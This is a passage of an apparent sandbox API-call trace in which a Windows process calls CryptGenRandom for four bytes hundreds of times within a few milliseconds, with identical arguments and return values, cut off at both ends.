pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 